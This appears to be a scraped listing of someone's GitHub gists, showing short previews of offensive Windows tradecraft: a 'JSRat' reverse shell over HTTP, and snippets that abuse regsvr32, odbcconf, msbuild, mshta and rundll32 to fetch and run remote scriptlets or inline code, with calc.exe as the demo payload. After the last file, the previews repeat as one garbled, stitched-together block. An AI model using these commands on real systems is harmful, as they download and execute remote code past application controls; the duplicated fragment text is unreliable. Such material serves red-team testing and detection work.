CyDoor

## JSRat.ps1
<#

  Author: Casey Smith @subTee

  License: BSD3-Clause

  .SYNOPSIS

  Simple Reverse Shell over HTTP. Execute Commands on Client.


## Techbench dump.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                CyDoor
                / Techbench dump.md
            
            
              Created
              December 14, 2016 21:00
            
              
                TechBench dump (https://github.com/mkuba50/techbench-dump)
              
          
    TechBench dump

Generated on 2016-12-04T21:20:00+0100 using:
- TechBench dump script (tbdump-master)
- FreeBSD 10.3-STABLE amd64 devil-1_0_4
- curl 7.49.1 (amd64-portbld-freebsd10.3) libcurl/7.49.1 OpenSSL/1.0.1s zlib/1.2.8 libssh2/1.7.0

Number of products: 173


## odbcconf.cs
/*
To use with odbcconf.exe:

odbcconf /S /A {REGSVR odbcconf.dll}

or, from a remote location (if WebDAV support enabled):
odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
*/

using System;

## msbuild.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
  <Target Name="Hello">
    <SharpLauncher >
    </SharpLauncher>
  </Target>
  <UsingTask
    TaskName="SharpLauncher"
    TaskFactory="CodeTaskFactory"

## Get-PinvokeMethod.ps1
function Get-NativeMethods
{
    [CmdletBinding()]
    param(
        [switch]$Unsafe
    )
    $Type = 'Microsoft.Win32.NativeMethods'
    if ($Unsafe)
    {
        $Type = 'Microsoft.Win32.UnsafeNativeMethods'

## RedCanaryLabs.bat
:: Basic Test Lab One
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct
::

regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll

:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)

## loadAssembly_method1.ps1
$Source = @"
using System;
using System.Net;
using System.Reflection;
namespace LoadAssembly {
public static class LoadAssembly {
public static void load() {
WebClient webclient = new WebClient();
IWebProxy defaultProxy = WebRequest.DefaultWebProxy;
if (defaultProxy != null) {

## calc.hta
<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
        var c = "cmd.exe /c calc.exe";
        new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>

## regsvr32.sct
<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
<scriptlet>
<registration
    progid="PoC"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
	<script language="JScript">
		<![CDATA[


## scriptlet.sct
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[

	var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
	<#

	Author: Casey Smith @subTee

	License: BSD3-Clause

	.SYNOPSIS

	Simple Reverse Shell over HTTP. Execute Commands on Client.
	/*
	To use with odbcconf.exe:

	odbcconf /S /A {REGSVR odbcconf.dll}

	or, from a remote location (if WebDAV support enabled):
	odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
	*/

	using System;
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes c# code. -->
	<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
	<Target Name="Hello">
	<SharpLauncher >
	</SharpLauncher>
	</Target>
	<UsingTask
	TaskName="SharpLauncher"
	TaskFactory="CodeTaskFactory"
	function Get-NativeMethods
	{
	[CmdletBinding()]
	param(
	[switch]$Unsafe
	)
	$Type = 'Microsoft.Win32.NativeMethods'
	if ($Unsafe)
	{
	$Type = 'Microsoft.Win32.UnsafeNativeMethods'
	:: Basic Test Lab One
	:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct
	::

	regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll

	:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
	:: NOTE We recommend executing from a server that you control.
	:: NOTE Thank You :)
	$Source = @"
	using System;
	using System.Net;
	using System.Reflection;
	namespace LoadAssembly {
	public static class LoadAssembly {
	public static void load() {
	WebClient webclient = new WebClient();
	IWebProxy defaultProxy = WebRequest.DefaultWebProxy;
	if (defaultProxy != null) {
	<html>
	<head>
	<HTA:APPLICATION ID="HelloExample">
	<script language="jscript">
	var c = "cmd.exe /c calc.exe";
	new ActiveXObject('WScript.Shell').Run(c);
	</script>
	</head>
	<body>
	<script>self.close();</script>
	<?XML version="1.0"?>
	<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
	<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
	<scriptlet>
	<registration
	progid="PoC"
	classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
	<script language="JScript">
	<![CDATA[
	<?XML version="1.0"?>
	<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
	<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
	<scriptlet>
	<public>
	</public>
	<script language="JScript">
	<![CDATA[

	var r = new ActiveXObject("WScript.Shell").Run("calc.exe");